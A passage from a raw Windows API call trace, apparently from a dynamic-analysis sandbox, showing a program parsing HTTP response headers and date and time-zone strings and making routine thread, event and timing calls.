lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0103.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0103.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.375] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0103.375] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f4 [0103.375] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f0 [0103.375] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x31f)) [0103.375] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0103.375] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x31f)) [0103.375] GetCurrentThreadId () returned 0x1358 [0103.375] GetCurrentThreadId () returned 0x1358 [0103.375] GetCurrentThreadId () returned 0x1358 [0103.375] GetCurrentThreadId () returned 0x1358 [0103.375] ResetEvent (hEvent=0x3f4) returned 1 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] ResetEvent (hEvent=0x3f4) returned 1 [0103.376] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x31f)) [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] SetEvent (hEvent=0x3f0) returned 1 [0103.376] SetEvent (hEvent=0x3f4) returned 1 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0103.376] GetTickCount64 () returned 0x115b235 [0103.376] GetTickCount64 () returned 0x115b235 [0103.376] GetTickCount64 () returned 0x115b235 [0103.376] GetTickCount64 () returned 0x115b235 [0103.376] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.376] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0103.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0103.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0103.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=4, lpWideCharStr=0x247aaac, cchWideChar=4 | out: lpWideCharStr="Bonn") returned 4 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.376] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] ResetEvent (hEvent=0x3f4) returned 1 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] GetCurrentThreadId () returned 0x1358 [0103.377] ResetEvent (hEvent=0x3f4) returned 1 [0103.377] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x31f)) [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] SetEvent (hEvent=0x3f0) returned 1 [0103.378] SetEvent (hEvent=0x3f4) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] ResetEvent (hEvent=0x3f4) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] ResetEvent (hEvent=0x3f4) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] SetEvent (hEvent=0x3f0) returned 1 [0103.378] SetEvent (hEvent=0x3f4) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] ResetEvent (hEvent=0x3f4) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 